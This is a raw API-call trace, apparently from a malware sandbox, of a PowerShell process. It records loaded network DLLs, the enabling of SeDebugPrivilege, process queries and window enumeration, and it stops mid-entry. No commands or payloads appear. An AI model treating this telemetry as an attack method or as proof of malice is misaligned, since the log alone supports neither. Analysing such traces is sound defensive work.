Region: id = 563 start_va = 0x2ae0000 end_va = 0x2aeffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 564 start_va = 0x6030000 end_va = 0x835cfff entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 565 start_va = 0x76be0000 end_va = 0x76cd4fff entry_point = 0x76be1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 566 start_va = 0x76470000 end_va = 0x765a5fff entry_point = 0x76471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 567 start_va = 0x76d30000 end_va = 0x76f2afff entry_point = 0x76d322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 568 start_va = 0x75760000 end_va = 0x75789fff entry_point = 0x75760000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 569 start_va = 0x8360000 end_va = 0x852ffff entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 678 start_va = 0x734f0000 end_va = 0x734f8fff entry_point = 0x734f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 9 os_tid = 0xa5c [0040.318] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0040.481] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0040.481] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0040.481] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0040.481] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0041.144] GetVersionExW (in: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0041.144] GetLastError () returned 0x2 [0041.145] GetVersionExW (in: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0041.145] GetLastError () returned 0x2 [0041.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e3ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.148] GetLastError () returned 0x2 [0041.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.159] GetLastError () returned 0x2 [0041.159] GetVersionExW (in: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x54e2b8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0041.159] GetLastError () returned 0x2 [0041.160] SetErrorMode (uMode=0x1) returned 0x1 [0041.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e848 | out: lpFileInformation=0x25e848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0041.161] GetLastError () returned 0x2 [0041.161] SetErrorMode (uMode=0x1) returned 0x1 [0041.163] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e8cc | out: lpdwHandle=0x25e8cc) returned 0x94c [0041.174] GetLastError () returned 0x0 [0041.175] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b54d28 | out: lpData=0x2b54d28) returned 1 [0041.178] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e898, puLen=0x25e894 | out: lplpBuffer=0x25e898*=0x2b54dc4, puLen=0x25e894) returned 1 [0041.179] lstrlenW (lpString="䅁") returned 1 [0041.194] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54ea0, puLen=0x25e810) returned 1 [0041.194] lstrlenW (lpString="Microsoft Corporation") returned 21 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54ef4, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="System.Management.Automation") returned 28 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54f50, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="6.1.7601.17514") returned 14 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54f90, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54ff8, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b55094, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b550f8, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b55174, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="6.1.7601.17514") returned 14 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0041.195] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x2b54e1c, puLen=0x25e810) returned 1 [0041.195] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0041.195] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0041.196] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x0, puLen=0x25e810) returned 0 [0041.196] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x0, puLen=0x25e810) returned 0 [0041.196] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e814, puLen=0x25e810 | out: lplpBuffer=0x25e814*=0x0, puLen=0x25e810) returned 0 [0041.196] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e808, puLen=0x25e804 | out: lplpBuffer=0x25e808*=0x2b54dc4, puLen=0x25e804) returned 1 [0041.196] VerLanguageNameW (in: wLang=0x0, szLang=0x54e2a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0041.210] VerQueryValueW (in: pBlock=0x2b54d28, lpSubBlock="\\", lplpBuffer=0x25e81c, puLen=0x25e818 | out: lplpBuffer=0x25e81c*=0x2b54d50, puLen=0x25e818) returned 1 [0041.234] GetCurrentProcessId () returned 0xa58 [0041.302] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x25e054 | out: lpLuid=0x25e054*(LowPart=0x14, HighPart=0)) returned 1 [0041.303] GetLastError () returned 0x0 [0041.304] GetCurrentProcess () returned 0xffffffff [0041.304] GetLastError () returned 0x0 [0041.305] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x25e050 | out: TokenHandle=0x25e050*=0x2fc) returned 1 [0041.306] GetLastError () returned 0x0 [0041.308] AdjustTokenPrivileges (in: TokenHandle=0x2fc, DisableAllPrivileges=0, NewState=0x2b57868*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0041.308] GetLastError () returned 0x0 [0041.309] CloseHandle (hObject=0x2fc) returned 1 [0041.309] GetLastError () returned 0x0 [0041.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa58) returned 0x2fc [0041.312] GetLastError () returned 0x0 [0041.325] EnumProcessModules (in: hProcess=0x2fc, lphModule=0x2b578ac, cb=0x100, lpcbNeeded=0x25e844 | out: lphModule=0x2b578ac, lpcbNeeded=0x25e844) returned 1 [0041.326] GetLastError () returned 0x0 [0041.328] GetModuleInformation (in: hProcess=0x2fc, hModule=0x22550000, lpmodinfo=0x2b579ec, cb=0xc | out: lpmodinfo=0x2b579ec*(lpBaseOfDll=0x22550000, SizeOfImage=0x72000, EntryPoint=0x22557363)) returned 1 [0041.328] GetLastError () returned 0x0 [0041.329] GetModuleBaseNameW (in: hProcess=0x2fc, hModule=0x22550000, lpBaseName=0x54ea60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0041.329] GetLastError () returned 0x0 [0041.330] GetModuleFileNameExW (in: hProcess=0x2fc, hModule=0x22550000, lpFilename=0x54ea60, nSize=0x800 | out: lpFilename="C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0041.330] GetLastError () returned 0x0 [0041.331] CloseHandle (hObject=0x2fc) returned 1 [0041.331] GetLastError () returned 0x0 [0041.333] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa58) returned 0x2fc [0041.333] GetLastError () returned 0x0 [0041.334] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x2b56e9c | out: lpExitCode=0x2b56e9c*=0x103) returned 1 [0041.334] GetLastError () returned 0x0 [0041.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3b55278, Length=0x20000, ResultLength=0x25e88c | out: SystemInformation=0x3b55278, ResultLength=0x25e88c*=0x9aa8) returned 0x0 [0041.358] EnumWindows (lpEnumFunc=0x1ee3612, lParam=0x0) returned 1 [0041.360] GetWindowThreadProcessId (in: hWnd=0x3013a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x73c [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x71c [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.360] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.360] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7e0 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7e0 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.361] GetLastError () returned 0x0 [0041.361] GetWindowThreadProcessId (in: hWnd=0x5009c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.361] GetLastError () returned 0x0 [0041.362] GetWindowThreadProcessId (in: hWnd=0x10094, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.362] GetLastError () returned 0x0 [0041.362] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa5c [0041.362] GetLastError () returned 0x0 [0041.362] GetWindow (hWnd=0x2010a, uCmd=0x4) returned 0x0 [0041.364] IsWindowVisible (hWnd=0x2010a) returned 0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x880 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x201b6, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x301d4, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x801c0, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x870 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x860 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x850 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x840 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x830 [0041.364] GetLastError () returned 0x0 [0041.364] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x820 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x810 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x710 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5b8 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x688 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x668 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x664 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x14c [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x144 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x638 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x6f4 [0041.365] GetLastError () returned 0x0 [0041.365] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x64 [0041.365] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x320 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x4a0 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x6a4 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x40158, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5c0 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x30156, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x704 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x71c [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x1014a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x718 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x20140, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x71c [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x718 [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x71c [0041.366] GetLastError () returned 0x0 [0041.366] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x704 [0041.366] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200d2, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x704 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200c2, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7f8 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5c8 [0041.367] GetLastError () returned 0x0 [0041.367] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x6b0 [0041.367] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x100fc, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x67c [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x654 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.368] 